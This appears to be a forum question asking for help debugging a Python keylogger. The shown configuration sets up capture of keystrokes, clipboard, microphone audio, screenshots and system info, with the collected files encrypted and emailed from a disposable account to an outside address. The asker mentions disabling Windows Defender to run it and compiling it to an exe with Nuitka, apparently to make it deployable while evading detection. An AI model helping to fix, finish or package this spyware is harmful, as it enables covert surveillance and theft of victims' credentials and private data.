# Created a advanced keylogger program in python, but the log file or email is not being created

Tags: python, security, keylogger

```
   keys_information = "key_log.txt"
system_information = "syseminfo.txt"
clipboard_information = "clipboard.txt"
audio_information = "audio.wav"
screenshot_information = "screenshot.png"

keys_information_e = "e_key_log.txt"
system_information_e = "e_systeminfo.txt"
clipboard_information_e = "e_clipboard.txt"

microphone_time = 10
time_iteration = 15
number_of_iterations_end = 3

email_address = " " # Enter disposable email here
password = " " # Enter email password here

username = getpass.getuser()

toaddr = " " # Enter the email address you want to send your information to

key = " " # Generate an encryption key from the Cryptography folder

file_path = " " # Enter the file path you want your files to be saved to
extend = "\\"
file_merge = file_path + extend
```

This is the code from Grant Collins. The github link is https://github.com/aress03/Python-keylogger-delivery
I ran the script through command line and disabled windows protector before hand. Still there wasn't any log created. I am also trying to use nuitka for compiling this code to exe

Comment: Please provide enough code so others can better understand or reproduce the problem.